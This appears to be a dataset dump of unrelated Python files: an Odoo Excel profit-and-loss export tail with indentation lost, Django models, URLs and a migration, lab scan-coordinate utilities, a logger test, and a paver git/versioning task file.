deposit_amount_4100004 = sum([rec.get('deposit_amount') for rec in code_data.get('4100004')])
credit_amount_4100004 = sum([rec.get('credit_amount') for rec in code_data.get('4100004')])
code_4100004 = deposit_amount_4100004 - credit_amount_4100004
if code_data.get('5100003'):
deposit_amount_5100003 = sum([rec.get('deposit_amount') for rec in code_data.get('5100003')])
credit_amount_5100003 = sum([rec.get('credit_amount') for rec in code_data.get('5100003')])
code_5100003 = deposit_amount_5100003 - credit_amount_5100003
if code_data.get('5100005'):
deposit_amount_5100005 = sum([rec.get('deposit_amount') for rec in code_data.get('5100005')])
credit_amount_5100005 = sum([rec.get('credit_amount') for rec in code_data.get('5100005')])
code_5100005 = deposit_amount_5100005 - credit_amount_5100005
if code_data.get('5100002'):
deposit_amount_5100002 = sum([rec.get('deposit_amount') for rec in code_data.get('5100002')])
credit_amount_5100002 = sum([rec.get('credit_amount') for rec in code_data.get('5100002')])
code_5100002 = deposit_amount_5100002 - credit_amount_5100002
if code_data.get('5100004'):
deposit_amount_5100004 = sum([rec.get('deposit_amount') for rec in code_data.get('5100004')])
credit_amount_5100004 = sum([rec.get('credit_amount') for rec in code_data.get('5100004')])
code_5100004 = deposit_amount_5100004 - credit_amount_5100004
if code_data.get('5200001'):
deposit_amount_5200001 = sum([rec.get('deposit_amount') for rec in code_data.get('5200001')])
credit_amount_5200001 = sum([rec.get('credit_amount') for rec in code_data.get('5200001')])
code_5200001 = deposit_amount_5200001 - credit_amount_5200001
if code_data.get('5200002'):
deposit_amount_5200002 = sum([rec.get('deposit_amount') for rec in code_data.get('5200002')])
credit_amount_5200002 = sum([rec.get('credit_amount') for rec in code_data.get('5200002')])
code_5200002 = deposit_amount_5200002 - credit_amount_5200002
if code_data.get('5200003'):
deposit_amount_5200003 = sum([rec.get('deposit_amount') for rec in code_data.get('5200003')])
credit_amount_5200003 = sum([rec.get('credit_amount') for rec in code_data.get('5200003')])
code_5200003 = deposit_amount_5200003 - credit_amount_5200003
if code_data.get('5200004'):
deposit_amount_5200004 = sum([rec.get('deposit_amount') for rec in code_data.get('5200004')])
credit_amount_5200004 = sum([rec.get('credit_amount') for rec in code_data.get('5200004')])
code_5200004 = deposit_amount_5200004 - credit_amount_5200004
if code_data.get('5200005'):
deposit_amount_5200005 = sum([rec.get('deposit_amount') for rec in code_data.get('5200005')])
credit_amount_5200005 = sum([rec.get('credit_amount') for rec in code_data.get('5200005')])
code_5200005 = deposit_amount_5200005 - credit_amount_5200005
if code_data.get('5200006'):
deposit_amount_5200006 = sum([rec.get('deposit_amount') for rec in code_data.get('5200006')])
credit_amount_5200006 = sum([rec.get('credit_amount') for rec in code_data.get('5200006')])
code_5200006 = deposit_amount_5200006 - credit_amount_5200006
if code_data.get('5200007'):
deposit_amount_5200007 = sum([rec.get('deposit_amount') for rec in code_data.get('5200007')])
credit_amount_5200007 = sum([rec.get('credit_amount') for rec in code_data.get('5200007')])
code_5200007 = deposit_amount_5200007 - credit_amount_5200007
if code_data.get('5200008'):
deposit_amount_5200008 = sum([rec.get('deposit_amount') for rec in code_data.get('5200008')])
credit_amount_5200008 = sum([rec.get('credit_amount') for rec in code_data.get('5200008')])
code_5200008 = deposit_amount_5200008 - credit_amount_5200008
if code_data.get('5200009'):
deposit_amount_5200009 = sum([rec.get('deposit_amount') for rec in code_data.get('5200009')])
credit_amount_5200009 = sum([rec.get('credit_amount') for rec in code_data.get('5200009')])
code_5200009 = deposit_amount_5200009 - credit_amount_5200009
if code_data.get('5200010'):
deposit_amount_5200010 = sum([rec.get('deposit_amount') for rec in code_data.get('5200010')])
credit_amount_5200010 = sum([rec.get('credit_amount') for rec in code_data.get('5200010')])
code_5200010 = deposit_amount_5200010 - credit_amount_5200010
sales_total = code_4100002 + code_4100003 + code_4100004 + code_4100005
sheet.write(row, 7, round(code_4100003, 2), format10)
sheet.write(row, 8, round(code_4100005, 2), format10)
sheet.write(row, 9, round(code_4100002, 2), format10)
sheet.write(row, 10, round(code_4100004, 2), format10)
sheet.write(row, 11, round(sales_total, 2), format11)
semi_total_code_4100003 += code_4100003
semi_total_code_4100005 += code_4100005
semi_total_code_4100002 += code_4100002
semi_total_code_4100004 += code_4100004
semi_total_code_5100003 += code_5100003
semi_total_code_5100005 += code_5100005
semi_total_code_5100002 += code_5100002
semi_total_code_5100004 += code_5100004
semi_total_code_5200001 += code_5200001
semi_total_code_5200002 += code_5200002
semi_total_code_5200003 += code_5200003
semi_total_code_5200004 += code_5200004
semi_total_code_5200005 += code_5200005
semi_total_code_5200006 += code_5200006
semi_total_code_5200007 += code_5200007
semi_total_code_5200008 += code_5200008
semi_total_code_5200009 += code_5200009
semi_total_code_5200010 += code_5200010
semi_sales_total += sales_total
purchase_total = code_5100002 + code_5100003 + code_5100004 + code_5100005
semi_purchase_total += purchase_total
sheet.write(row, 12, round(code_5100003, 2), format10)
sheet.write(row, 13, round(code_5100005, 2), format10)
sheet.write(row, 14, round(code_5100002, 2), format10)
sheet.write(row, 15, round(code_5100004, 2), format10)
sheet.write(row, 16, round(purchase_total, 2), format11)
city_name = excel_lines.get('city').name
sheet.write(row, 18, round(code_5200001, 2), format10)
sheet.write(row, 19, round(code_5200002, 2), format10)
sheet.write(row, 20, round(code_5200003, 2), format10)
sheet.write(row, 21, round(code_5200004, 2), format10)
sheet.write(row, 22, round(code_5200005, 2), format10)
sheet.write(row, 23, round(code_5200006, 2), format10)
sheet.write(row, 24, round(code_5200007, 2), format10)
sheet.write(row, 25, round(code_5200008, 2), format10)
sheet.write(row, 26, round(code_5200009, 2), format10)
sheet.write(row, 27, round(code_5200010, 2), format10)
other_cos_total = code_5200001 + code_5200002 + code_5200003 + code_5200004 + \
code_5200005 + code_5200006 + code_5200007 + code_5200008 + \
code_5200009 + code_5200010
semi_other_cos_total += other_cos_total
sheet.write(row, 28, round(other_cos_total, 2), format11)
city_names.append(city_name)
difference = sales_total - purchase_total
if sales_total > 0:
gp_percent = (difference/sales_total)*100
else:
gp_percent = 0
semi_gp_percent_total += gp_percent
semi_difference_total += difference
sheet.write(row, 30, round(sales_total, 2), format10)
sheet.write(row, 31, round(purchase_total, 2), format10)
sheet.write(row, 32, round(difference, 2), format10)
sheet.write(row, 33, round(gp_percent, 2), format10)
row += 1
sheet.write_merge(row, row, 0, 6, 'Total', format13)
final_total_code_4100003 += semi_total_code_4100003
final_total_code_4100005 += semi_total_code_4100005
final_total_code_4100002 += semi_total_code_4100002
final_total_code_4100004 += semi_total_code_4100004
final_total_code_5100003 += semi_total_code_5100003
final_total_code_5100005 += semi_total_code_5100005
final_total_code_5100002 += semi_total_code_5100002
final_total_code_5100004 += semi_total_code_5100004
final_total_code_5200001 += semi_total_code_5200001
final_total_code_5200002 += semi_total_code_5200002
final_total_code_5200003 += semi_total_code_5200003
final_total_code_5200004 += semi_total_code_5200004
final_total_code_5200005 += semi_total_code_5200005
final_total_code_5200006 += semi_total_code_5200006
final_total_code_5200007 += semi_total_code_5200007
final_total_code_5200008 += semi_total_code_5200008
final_total_code_5200009 += semi_total_code_5200009
final_total_code_5200010 += semi_total_code_5200010
final_sales_total += semi_sales_total
final_purchase_total += semi_purchase_total
final_difference_total += semi_difference_total
final_other_cos_total += semi_other_cos_total
final_gp_percent_total += semi_gp_percent_total
sheet.write(row, 7, round(semi_total_code_4100003, 2), format12)
sheet.write(row, 8, round(semi_total_code_4100005, 2), format12)
sheet.write(row, 9, round(semi_total_code_4100002, 2), format12)
sheet.write(row, 10, round(semi_total_code_4100004, 2), format12)
sheet.write(row, 11, round(semi_sales_total, 2), format12)
sheet.write(row, 12, round(semi_total_code_5100003, 2), format12)
sheet.write(row, 13, round(semi_total_code_5100005, 2), format12)
sheet.write(row, 14, round(semi_total_code_5100002, 2), format12)
sheet.write(row, 15, round(semi_total_code_5100004, 2), format12)
sheet.write(row, 16, round(semi_purchase_total, 2), format12)
sheet.write(row, 18, round(semi_total_code_5200001, 2), format12)
sheet.write(row, 19, round(semi_total_code_5200002, 2), format12)
sheet.write(row, 20, round(semi_total_code_5200003, 2), format12)
sheet.write(row, 21, round(semi_total_code_5200004, 2), format12)
sheet.write(row, 22, round(semi_total_code_5200005, 2), format12)
sheet.write(row, 23, round(semi_total_code_5200006, 2), format12)
sheet.write(row, 24, round(semi_total_code_5200007, 2), format12)
sheet.write(row, 25, round(semi_total_code_5200008, 2), format12)
sheet.write(row, 26, round(semi_total_code_5200009, 2), format12)
sheet.write(row, 27, round(semi_total_code_5200010, 2), format12)
sheet.write(row, 28, round(semi_other_cos_total, 2), format12)
sheet.write(row, 30, round(semi_sales_total, 2), format12)
sheet.write(row, 31, round(semi_purchase_total, 2), format12)
sheet.write(row, 32, round(semi_difference_total, 2), format12)
sheet.write(row, 33, round(semi_gp_percent_total, 2), format12)
row += 1
row += 1
sheet.write_merge(row, row, 0, 6, 'Total', format15)
sheet.write(row, 7, round(final_total_code_4100003, 2), format14)
sheet.write(row, 8, round(final_total_code_4100005, 2), format14)
sheet.write(row, 9, round(final_total_code_4100002, 2), format14)
sheet.write(row, 10, round(final_total_code_4100004, 2), format14)
sheet.write(row, 11, round(final_sales_total, 2), format14)
sheet.write(row, 12, round(final_total_code_5100003, 2), format14)
sheet.write(row, 13, round(final_total_code_5100005, 2), format14)
sheet.write(row, 14, round(final_total_code_5100002, 2), format14)
sheet.write(row, 15, round(final_total_code_5100004, 2), format14)
sheet.write(row, 16, round(final_purchase_total, 2), format14)
sheet.write(row, 18, round(final_total_code_5200001, 2), format14)
sheet.write(row, 19, round(final_total_code_5200002, 2), format14)
sheet.write(row, 20, round(final_total_code_5200003, 2), format14)
sheet.write(row, 21, round(final_total_code_5200004, 2), format14)
sheet.write(row, 22, round(final_total_code_5200005, 2), format14)
sheet.write(row, 23, round(final_total_code_5200006, 2), format14)
sheet.write(row, 24, round(final_total_code_5200007, 2), format14)
sheet.write(row, 25, round(final_total_code_5200008, 2), format14)
sheet.write(row, 26, round(final_total_code_5200009, 2), format14)
sheet.write(row, 27, round(final_total_code_5200010, 2), format14)
sheet.write(row, 28, round(final_other_cos_total, 2), format14)
sheet.write(row, 30, round(final_sales_total, 2), format14)
sheet.write(row, 31, round(final_purchase_total, 2), format14)
sheet.write(row, 32, round(final_difference_total, 2), format14)
sheet.write(row, 33, round(final_gp_percent_total, 2), format14)
filename = ('Project Profit & Loss Analysis'+ '.xls')
workbook.save(filename)
file = open(filename, "rb")
file_data = file.read()
out = base64.encodestring(file_data)
export_id = self.env['profit.loss.excel'].create({'file_name': filename, 'field_data': out})
return {
'type': 'ir.actions.act_window',
'res_model': 'profit.loss.excel',
'view_mode': 'form',
'view_type': 'form',
'view_id': self.env.ref('zaki_profit_loss_excel_report.account_profit_loss_report_excel_wizard').id,
'res_id': export_id.id,
'target': 'new',
} |
19,242 | 423fe5c1b0e487c00e132243e4c80d5da3f91ccd |
# include():
# A function that takes a full Python import path
# to another URLconf module whose patterns should
# be "included" at this point in the URL configuration.
from django.contrib import admin
# include: so you can include separate files.
from django.urls import path, include
# Root URLconf: delegate all URL routing to the "leads" app's URLconf.
urlpatterns = [
    path('', include('leads.urls')),
]
|
19,243 | b88228138abad89fa20286f9fa267b12373476d2 | from django.db.models import Model
from django.db.models import CharField, TextField, ForeignKey, BooleanField, ImageField
from django.db.models import SET_NULL
from .setting import Setting
from django.db.models.signals import pre_delete, pre_save
from django.dispatch import receiver
class Page(Model):
    """A CMS page: raw HTML stored under a slug, optionally attached to a menu."""
    name = CharField(max_length=200, verbose_name='Название')
    is_sidebar = BooleanField(default=False, verbose_name='Сайдбар?')
    sidebar_name = CharField(max_length=200, null=True, blank=True, default='', verbose_name='Сайдбар, название')
    # sidebar_menu = ForeignKey('Menu', blank=True, null=True, on_delete=SET_NULL, verbose_name='Сайдбар, пункт меню')
    slug = CharField(max_length=200, verbose_name='Техническое имя')
    menu = ForeignKey('Menu', blank=True, null=True, on_delete=SET_NULL, verbose_name='Меню')
    html = TextField(verbose_name='HTML')

    def __str__(self):
        # '|' stands in for "no menu" so listings stay readable.
        return '%s -> %s' % (self.menu if self.menu else '|', self.name)

    @staticmethod
    def get(slug):
        """Return the page HTML for *slug*, or the configured fallback text.

        Bug fix: the original bare ``except:`` also hid real failures
        (e.g. database errors); only a missing page now triggers the
        fallback, everything else propagates.
        """
        try:
            text = Page.objects.get(slug=slug).html
        except Page.DoesNotExist:
            text = Setting.get('no_page_parent')
        return text

    @staticmethod
    def get_menu(menu):
        """Map slug -> name for every page attached to *menu*."""
        pages = Page.objects.filter(menu=menu)
        return {page.slug: page.name for page in pages}

    class Meta:
        verbose_name = 'Страница'
        verbose_name_plural = 'Страницы'
class PageImage(Model):
    """An image attached to a Page, addressable by its slug."""
    page = ForeignKey(Page, null=True, blank=True, on_delete=SET_NULL, verbose_name='Картинка для страницы')
    slug = CharField(max_length=200, verbose_name='Техническое имя')
    image = ImageField(upload_to='main/images/page_image/images', null=True, blank=True, verbose_name='Картинка')

    def __str__(self):
        # Bug fix: the original returned ``self.image.page.name`` — an
        # ImageField value has no ``page`` attribute, so str() always
        # raised. ``page`` is nullable, hence the slug fallback.
        return self.page.name if self.page else self.slug

    class Meta:
        verbose_name = 'Картинка для страницы'
        verbose_name_plural = 'Картинки для страниц'
# Сигналы --------------------------------------------------------------------------------------------------------------
# Удаление картинки при удалении объекта
@receiver(pre_delete, sender=PageImage)
def page_image_pre_delete(sender, instance, using, **kwargs):
    # Remove the stored file from disk when the row is deleted;
    # save=False because the model instance is going away anyway.
    instance.image.delete(save=False)
# Удаление картинки при изменении объекта
@receiver(pre_save, sender=PageImage)
def page_image_pre_save(sender, instance, raw, using, update_fields, **kwargs):
    # A new (unsaved) object has no previous image to clean up.
    if not instance.pk:
        return False
    try:
        # Fetch the image currently stored for this primary key.
        old_image = PageImage.objects.get(pk=instance.pk).image
    except PageImage.DoesNotExist:
        return False
    # Delete the old file only when it is actually being replaced;
    # save=False so the pending save operation is not disturbed.
    if not old_image == instance.image:
        old_image.delete(save=False)
19,244 | 4a3b09e8f8a7e7d03f50b3dc3b569ebc25f1d26f | from sys import stdin
from random import shuffle
# Python 2 filter: shuffle the lines read from stdin and print them in
# random order.
# NOTE(review): split('\n') keeps a trailing empty string when the input
# ends with a newline, so one blank line may be printed — confirm intended.
lines = stdin.read().split('\n')
shuffle(lines)
for line in lines:
    print line
|
19,245 | cd99abb02e0a4ee3c3c15adf25a7872b83f3786b | # -*- coding: utf-8 -*-
"""
Created on Mon Jun 10 14:49:26 2019
This is the utility file for ImAGERS, the KM group instrumentation software
(IMage Acquisition and Generalized Experimet Recipe Software).
This file should contain any functions that are common between multiple
experiment types with the goal of making it easy for users to design their own
experiment scripts by combining these functions in various ways.
Note: Storing classes in modules for easy loading: http://introtopython.org/classes.html#Storing-a-single-class-in-a-module
@author: ecating
"""
import numpy as np
import matplotlib.pyplot as plt
import time
# Functions to initialize your system -----------------------------------------
def load_config():
    # Stub: intended to load the experiment/system configuration.
    # Not yet implemented — returns None.
    return
def initialize_all():
    # Stub: intended to initialise all instruments at once.
    # Not yet implemented — returns None.
    return
# Functions which provide spatial scan coordinates ----------------------------
def fermat_spiral_points(center, beam_diam, overlap, num_points):
    """Generate ``num_points`` scan positions on a Fermat (golden-angle) spiral.

    Bug fix: the original body was empty and returned the undefined name
    ``spiral`` (NameError on every call).

    Parameters
    ----------
    center : sequence of two floats
        (x, y) position of the spiral centre.
    beam_diam : float
        Beam diameter; together with ``overlap`` it sets the spot spacing.
    overlap : float
        Desired fractional overlap between neighbouring spots (0..1).
    num_points : int
        Total number of positions to generate.

    Returns
    -------
    list of [x, y] pairs (same format as ``rand_raster``), first point at
    ``center``.
    """
    # Centre-to-centre spacing that yields the requested overlap.
    step = beam_diam * (1.0 - overlap)
    golden_angle = np.pi * (3.0 - np.sqrt(5.0))  # ~137.5 degrees
    n = np.arange(num_points)
    # Vogel's construction: r ~ sqrt(n) with golden-angle increments gives a
    # Fermat spiral with near-uniform point density.
    r = step * np.sqrt(n)
    theta = n * golden_angle
    x = center[0] + r * np.cos(theta)
    y = center[1] + r * np.sin(theta)
    spiral = [[xi, yi] for xi, yi in zip(x, y)]
    return spiral
def fermat_spiral_area(center, beam_diam, overlap, area):
    """Generate Fermat (golden-angle) spiral scan positions covering ``area``.

    The point count is estimated by assuming each spot accounts for roughly
    ``step**2`` of area, where ``step`` is the overlap-adjusted spacing.
    NOTE(review): the original function was an empty stub returning an
    undefined name (NameError); confirm the area -> point-count relation
    matches the intended experiment design.

    Returns a list of [x, y] pairs, first point at ``center``.
    """
    step = beam_diam * (1.0 - overlap)
    num_points = max(1, int(np.ceil(area / step ** 2)))
    golden_angle = np.pi * (3.0 - np.sqrt(5.0))  # ~137.5 degrees
    n = np.arange(num_points)
    r = step * np.sqrt(n)
    theta = n * golden_angle
    x = center[0] + r * np.cos(theta)
    y = center[1] + r * np.sin(theta)
    spiral = [[xi, yi] for xi, yi in zip(x, y)]
    return spiral
def rand_raster(center, step_size, num_points, random):
    """Serpentine raster scan around ``center`` with optional random jitter.

    Parameters
    ----------
    center : sequence of two floats
        (x, y) centre of the (square) scan area.
    step_size : float
        Average spacing between neighbouring scan positions.
    num_points : int
        Requested number of positions; truncated to the nearest square.
    random : float
        Percentage of ``step_size`` by which each coordinate may be randomly
        offset, to prevent periodic-sampling artefacts; 0 disables jitter.
        Bug fix: the original accepted this parameter but never used it.

    Returns
    -------
    list of [x, y] pairs in serpentine (boustrophedon) order.
    """
    xscan = []
    yscan = []
    xcenter = center[0]  # first element of center array
    ycenter = center[1]  # second element of center array
    scan_size = int(np.sqrt(num_points))  # assumes a square scan area
    xrange = np.arange(xcenter - ((scan_size - 1) * step_size) / 2, xcenter + ((scan_size - 1) * step_size) / 2 + step_size, step_size)
    yrange = np.arange(ycenter - ((scan_size - 1) * step_size) / 2, ycenter + ((scan_size - 1) * step_size) / 2 + step_size, step_size)
    # Serpentine ordering: every other row is traversed right-to-left to
    # minimise stage travel.
    for step, ystep in enumerate(yrange):
        xscan.append(xrange[::(-1) ** step])
        yscan.append(np.ones_like(xrange) * ystep)
    xscan = np.concatenate(xscan)
    yscan = np.concatenate(yscan)
    if random:
        # Bug fix: apply the documented random offset, a percentage of the
        # step size; the original signature accepted ``random`` but ignored it.
        jitter = step_size * random / 100.0
        xscan = xscan + np.random.uniform(-jitter, jitter, xscan.shape)
        yscan = yscan + np.random.uniform(-jitter, jitter, yscan.shape)
    # Pair the coordinate arrays into [x, y] scan positions.
    raster = [[x, y] for x, y in zip(xscan, yscan)]
    return raster
# Functions which provide temporal scan coordinates ---------------------------
def delay_times_linear(min_t, max_t, step_size):
    """Build an ascending array of delay-stage times (ps).

    Values are generated downward from ``max_t`` toward ``min_t`` in
    ``step_size`` decrements (so ``max_t`` is always included) and then
    reversed into ascending order.
    """
    descending = np.arange(max_t, min_t - step_size, -step_size)
    return descending[::-1]
def delay_times_double(min_t, t2, step_size1, max_t, step_size2):
    """Two-resolution delay scan, returned in ascending order.

    Runs from ``min_t`` up to ``t2`` in ``step_size1`` increments, then
    from above ``t2`` to ``max_t`` in ``step_size2`` increments.
    """
    coarse = np.arange(max_t, t2, -step_size2)
    fine = np.arange(t2, min_t - step_size1, -step_size1)
    combined = np.concatenate((coarse, fine), axis=0)
    return combined[::-1]
def delay_times_exp(min_t, max_t, t0, min_step, max_step, number_of_steps):
    """Return a list of delay times spaced exponentially around ``t0``.

    ``number_of_steps`` points are placed between ``min_t`` and ``t0``
    (densest near ``t0``) and half that many between ``t0`` and ``max_t``.
    ``min_step`` and ``max_step`` are currently unused. The generated
    delays are also plotted as a visual sanity check.
    """
    after_t0 = np.logspace(np.log(min_t), np.log(t0), num=number_of_steps, endpoint=True, base=np.e)
    # Mirror the log spacing so points cluster near t0 rather than min_t.
    after_t0 = min_t + t0 - after_t0
    after_t0 = after_t0[::-1]
    # Drop the t0 endpoint — it duplicates the first before_t0 point.
    after_t0 = after_t0[:-1]
    # Bug fix: ``number_of_steps / 2`` is a float under Python 3 and makes
    # np.logspace raise TypeError; integer division is what was intended.
    before_t0 = np.logspace(np.log(t0), np.log(max_t), num=number_of_steps // 2, endpoint=True, base=np.e)
    delays = np.concatenate([after_t0, before_t0]).tolist()
    y = np.zeros_like(delays)
    plt.plot(delays, y, 'o')
    return delays
# def ps_to_mm(delays, stage_passes, t0_in_ps):
# """Converts values in ps to values in mm."""
# mm_delays = (delays + t0_in_ps) * (1/stage_passes) * 0.2998
# return mm_delays
def ps_to_mm(delays, stage_passes):
    """Convert delay values in picoseconds to stage positions in mm.

    Light travels ~0.2998 mm per ps; the optical path is folded over the
    stage ``stage_passes`` times, so the mechanical move is scaled down
    accordingly.
    """
    per_pass = 1 / stage_passes
    return delays * per_pass * 0.2998
# def mm_to_ps(delays_in_mm, stage_passes, t0_in_ps):
# """Converts values in ps to values in mm."""
# ps_delays = (delays_in_mm * stage_passes)/0.2998 - t0_in_ps
# return ps_delays
def mm_to_ps(delays_in_mm, stage_passes):
    """Convert stage positions in mm back to delay values in picoseconds.

    Inverse of ``ps_to_mm``: multiply by the number of passes to recover
    the total optical path, then divide by 0.2998 mm/ps.
    """
    total_path = delays_in_mm * stage_passes
    return total_path / 0.2998
#
## --------------- Testing functions --------------------------------
#
#def alignStage(stage):
# for i in range(100):
# stage.moveStageTo(stage.maxPos)
# time.sleep(5/60)
# stage.moveStageTo(stage.minPos)
# time.sleep(5/60)
# Data plotting functions ---------------------------------------------------
def create_new_fig():
    # Thin wrapper around matplotlib so experiment scripts need not import
    # pyplot directly.
    return plt.figure()
#def plot_point(x,y,fig_handle):
|
19,246 | 35d490ebe658d8aebffe565ee306899e36a2d937 | # Generated by Django 2.1.5 on 2019-02-12 04:06
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated migration: replaces product -> product_type with
    product -> product_detail_type, and links product_detail_type to
    product_type (default=123 with preserve_default=False supplies a value
    for existing rows at migration time only)."""

    dependencies = [
        ('mainsite', '0011_auto_20190212_1256'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='product',
            name='product_type',
        ),
        migrations.RemoveField(
            model_name='product_type',
            name='detail_type',
        ),
        migrations.AddField(
            model_name='product',
            name='product_detail_type',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='mainsite.Product_detail_type'),
        ),
        migrations.AddField(
            model_name='product_detail_type',
            name='product_type',
            field=models.ForeignKey(default=123, on_delete=django.db.models.deletion.CASCADE, to='mainsite.Product_type'),
            preserve_default=False,
        ),
    ]
|
19,247 | 073b738b2db6e90b84df6a5051c68f335bb1982d | import threading, time
# Demo of a background thread: "End of program." prints before "Wake up!"
# because the main thread does not wait for the worker to finish.
print('Start of program.')
def takeANap(): #1
    # Worker body: block for five seconds, then announce waking up.
    time.sleep(5)
    print('Wake up!')
threadObj = threading.Thread(target=takeANap) #2
threadObj.start() #3
print('End of program.')
|
19,248 | f6bbcc3d237a90a9a2b0e482e7153ffe2f64d53e | def gap(a,b):
    # Difference b - a; a negative gap is replaced by a huge sentinel
    # (10**18) so min() below effectively discards that option.
    x = b-a
    if x<0:
        x = 10**18
    return x
a,b = [int(i) for i in input().split()]
# Try all four sign combinations; each sign flip adds 1 to the cost,
# as encoded by the 1+ / 2+ terms.
print(min(gap(a,b), 1+gap(a,-b), 1+gap(-a,b), 2+gap(-a,-b)))
19,249 | b88a3c08f645eec248c4180df02a2b59d3c3c06f | version https://git-lfs.github.com/spec/v1
oid sha256:600e44b1e44019fcbcddf67dc8665ea6670580bf13c9a35ddb3affbffc55a895
size 1192
|
19,250 | 44c713cc21495d9d6b63c35e312e5060ce2bc61f | #!/usr/bin/python3.7
from unittest import TestCase
from logger_multi_modules.SingleLogger import SingleLogger
class TestSingleLogger(TestCase):
    """Exercises SingleLogger at every log level.

    Bug fix: the original wrapped every call in ``try/except: raise
    Exception``, which replaced the real failure (and its traceback) with
    a bare ``Exception``. Letting errors propagate gives unittest the
    actual diagnostics, so the wrappers were removed.
    """
    _name = "test.singlelogger"

    def setUp(self):
        self.log = SingleLogger(("%s.%s" %("Single Logging", __name__)), 0, "../log/global/", "unified_logger.log")
        self.assertIsInstance(self.log, SingleLogger, "Singleton Logger criado com sucesso")

    def testGetInfoLevel(self):
        self.log.getInfoLevel()
        self.log.logger.info("Executed Log in Info Level")

    def testGetDebugLevel(self):
        self.log.getDebugLevel()
        self.log.logger.debug("Executed Log in Debug Level")

    def testGetWarningLevel(self):
        self.log.getWarningLevel()
        self.log.logger.warning("Executed Log in Warning Level")

    def testGetCriticalLevel(self):
        self.log.getCriticalLevel()
        self.log.logger.critical("Executed Log in Critical Level")

    def testGetErrorLevel(self):
        # NOTE(review): the call matches the (misspelled) API name
        # ``getErrorlLevel`` exposed by SingleLogger — confirm before renaming.
        self.log.getErrorlLevel()
        self.log.logger.error("Executed Log in Error Level")

    def tearDown(self):
        TestCase.tearDown(self)

    def doCleanups(self):
        return TestCase.doCleanups(self)
|
19,251 | 6da07f298a935ccfcafc6de826cd3727ccb93bdf | from paver import easy,options
from paver.easy import path,sh
from paver.options import Bunch
from jsmin import jsmin
from redis import Redis
# uglipyjs is an optional dependency; fall back to no uglification when it
# is not installed. Bug fix: the bare ``except`` also swallowed unrelated
# errors (e.g. KeyboardInterrupt or a broken uglipyjs installation).
try:
    from uglipyjs import compile as uglify
except ImportError:
    uglify = None
import json
import os
# Module-level state shared by the tasks below.
cache = Redis()  # local Redis used to remember the active git branch
testbunch = Bunch(
    x='y',
    js_dir='js/files',
    css_indir='css/src',
    cssout='vendor/css',
)
# Redis SET options: entries expire after 2 hours.
SET_ARG = dict(ex=7200)
options.test = testbunch
# Asset-pipeline state: collected css/js text, source folders, and the
# per-file (name, contents) list filled in by get_js.
options.assets = Bunch(
    css='',
    js='',
    folders=Bunch(
        js='static/js',
        css='static/css',
    ),
    js_files=[],
)
easy.environment.ttt = 'hnmmm'
easy.environment.assets = ''
# Convenience wrappers: cache writes always carry the expiry options.
cache_set = lambda key,val: cache.set(key,val,**SET_ARG)
cache_get = lambda key: cache.get(key)
def get_version():
    """Read the current version string from version.json.

    Fixes: the original re-imported ``json`` locally (it is already
    imported at module level) and left the file handle unclosed.
    """
    with open('version.json', 'r') as f:
        return json.load(f).get('version')
def set_version(version):
    """Write *version* to version.json (Python 2 module: print statement)."""
    print 'setting version to {}'.format(version)
    with open('version.json','w') as f:
        f.write(json.dumps(dict(version=version)))
@easy.task
@easy.cmdopts([
    ('branch=','b','a new branch to create to work on')],
    share_with=['done'])
def work_on(options,branch=None):
    """Create and switch to a feature branch, remembering it in Redis.

    The branch name comes from the argument or the --branch option; it is
    cached so the ``done`` task can later find it without being told.
    """
    if branch is None:
        branch = options.work_on.branch
    cache_set('PAVER:GIT:BRANCH',branch)
    easy.info('Switching to branch {}'.format(branch))
    sh('git checkout -b {}'.format(branch))
def finish(branch=None):
    """Merge *branch* into master, delete it, and bump the version.

    NOTE(review): placement of increment_version() at function level (i.e.
    the version is bumped even when branch is None) reconstructed from
    mangled indentation — confirm against the original file.
    """
    if branch is not None:
        sh('git checkout master')
        sh('git merge {}'.format(branch))
        sh('git branch -d {}'.format(branch))
    increment_version()
@easy.task
@easy.cmdopts([
    ('branch=','b','the current branch to merge with master')]
    ,share_with=['work_on']
)
def done(options,branch=None):
    """Finish the feature branch started with ``work_on``.

    Falls back to the branch name remembered in Redis, then to the
    --branch command-line option.
    """
    if branch is None:
        branch = cache_get('PAVER:GIT:BRANCH') or options.done.branch
    finish(branch)
@easy.task
def version():
    """Print the current version read from version.json."""
    easy.info(get_version())
@easy.task
def increment_version():
    """Bump the patch digit, rolling over at 9 (x.y.9 -> x.(y+1).0, etc.).

    Bug fix: the original major-rollover test was
    ``str(l).endswith == '9'`` — comparing a bound method to a string,
    which is always False — and its branch indexed an int
    (``l[0]``, a TypeError). The major component now simply increments
    when the minor digit rolls over.
    """
    major, minor, patch = map(int, get_version().split('.'))
    if patch == 9:
        patch = 0
        if minor == 9:
            minor = 0
            major += 1
        else:
            minor += 1
    else:
        patch += 1
    set_version('.'.join(map(str, [major, minor, patch])))
@easy.task
def print_test(arg=None):
    """Demo task: print *arg*, or the test bunch's js_dir when absent."""
    if arg is None:
        print options.test.js_dir
    else:
        print arg
@easy.task
def print_more():
    """Demo: mutate shared options, then re-run print_test to show sharing."""
    options.test.js_dir = 'yessss'
    easy.call_task('print_test')
@easy.task
def out1():
    """Demo: seed easy.environment.assets with a multi-line string."""
    easy.environment.assets = 'myassets\njbjkak\nxjbxkbk\n'
@easy.task
def out2():
    """Demo: run out1, then split the shared assets string into a list."""
    easy.call_task('out1')
    #print easy.environment.assets
    assets = easy.environment.assets.split('\n')
    easy.environment.assets = assets
@easy.task
def out3(assets):
    """Demo: run out2 and print the resulting assets list."""
    # NOTE(review): the ``assets`` parameter is unused and paver tasks are
    # normally zero-argument; confirm whether it should be removed.
    easy.call_task('out2')
    print easy.environment.assets
@easy.task
def get_js():
    """Collect (name, contents) pairs for every file in the js folder."""
    options.assets.js_files = [(x.name,x.text()) for x in easy.path(options.assets.folders.js).files()]
@easy.task
def get_css():
    """Return the accumulated css string (initialised empty above)."""
    return options.assets.css
@easy.task
@easy.consume_args
def add_js_files(args, files=None):
    """Append the contents of each named file to the shared js blob.

    Fix: ``files=[]`` was a mutable default argument; it was never mutated
    here, but ``None`` plus a local fallback removes the latent hazard.
    """
    for filename in args + (files or []):
        options.assets.js += easy.path(filename).text()
@easy.task
@easy.consume_args
def show(args,ttt):
    """Full asset pipeline: bump version, gather js, minify, uglify, concat.

    An optional first positional argument overrides the js source folder.
    NOTE(review): confirm how the ``ttt`` parameter is bound when paver
    invokes this task — it is unused in the body.
    """
    if args:
        options.assets.folders.js = args[0]
